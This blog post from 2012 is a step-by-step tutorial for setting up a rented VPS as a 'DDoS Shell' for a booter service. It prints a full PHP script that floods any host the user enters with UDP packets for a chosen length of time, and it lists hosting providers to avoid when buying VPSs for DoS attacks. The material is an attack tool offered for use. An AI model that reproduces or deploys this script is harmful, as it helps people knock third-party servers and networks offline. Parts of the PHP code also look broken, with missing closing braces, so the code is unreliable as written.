border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Thursday, June 7, 2012

How To Shell A VPS Tutorial






In this tutorial you will learn how to shell a VPS so that you can then add it to your Shell Booter, etc.


Step 1
You are going to need to buy a VPS. Once you have done that install this OS centos-6-x86


Step 2
Login to your VPS now via PuTTy.
Type: yum install http


Then type y and hit enter if it prompts you to do so. Now once that is done.


Type: yum install php
Then type y and hit enter if it prompts you to do so.


Step 3
Download WinSCP and then login to it with your VPS. Once their you will be at the root directory.




Step 4
Click the 2 dots at the top



Step 5
Now go to the bottom and click var.
Click image to enlarge




Step 6
Now click www.
Click image to enlarge



Step 7
Now click html.
Click image to enlarge



Step 8
Once you are their now create a new file and call it shell.php when a new box opens copy and paste this.


<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> 
<title>+DDoS Shell</title>
<center> 
<body background="http://i701.photobucket.com/albums/ww12/skyw09/matrix-gradient.gif">
<font color="FF3636"> 
<font size= "6">
<font size="5">
<pre> 


</pre> 
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font>&nbsp;(Don't Hit yourself)<br><br><font color="red">
</font>
<STYLE> 
input{ 
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66; 

button{ 
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66; 

body { 



</style> 
<?php 
//UDP 
if(isset($_GET['host'])&&isset($_GET['time'])){ 
$packets = 0; 
ignore_user_abort(TRUE); 
set_time_limit(0); 


$exec_time = $_GET['time']; 


$time = time(); 
//print "Started: ".time('d-m-y h:i:s')."<br>"; 
$max_time = $time+$exec_time; 


$host = $_GET['host']; 


for($i=0;$i<65000;$i++){ 
$out .= 'X'; 

while(1){ 
$packets++; 
if(time() > $max_time){ 
break; 

$rand = rand(1,65000); 
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); 
if($fp){ 
fwrite($fp, $out); 
fclose($fp); 


echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; 
echo '<br><br> 
<form action="'.$surl.'" method=GET> 
<input type="hidden" name="act" value="phptools"> 
Host: <br><input type=text name=host><br> 
Length (seconds): <br><input type=text name=time><br> 
<input type=submit value=Go></form>'; 
}else{ echo '<br><b>UDP Flood</b><br> 
<form action=? method=GET> 
<input type="hidden" name="act" value="phptools"> 
Host: <br><input type=text name=host value=><br> 
Length (seconds): <br><input type=text name=time value=><br><br> 
<input type=submit value=Go></form>'; 

?> 
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>Don't over use this shell if you do i will no long release shells</strong></font></marquee>
<marquee behavior="scroll" direction="left"><font color="blue"><center><strong>Welcome To +DDoS Shell</strong></font></marquee</center> 
</body> 
</html>


Then hit save. A box should appear asking for your password, enter it. You can change that to another shell, but I'm going to use this one.
Step 9
Now open your web-browser and type your VPS's IP + /shell.php on the end.
e.g. 1.1.1.1/shell.php


Where Not To Buy VPS's For DoS Attacks
1. Santrex
2. Whitelabel
3. Rethinkvps
4. 123com (they take forever to send the VPS)
5. nqhost
6. alibabahost
7. hosthatch

No comments:

Post a Comment

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More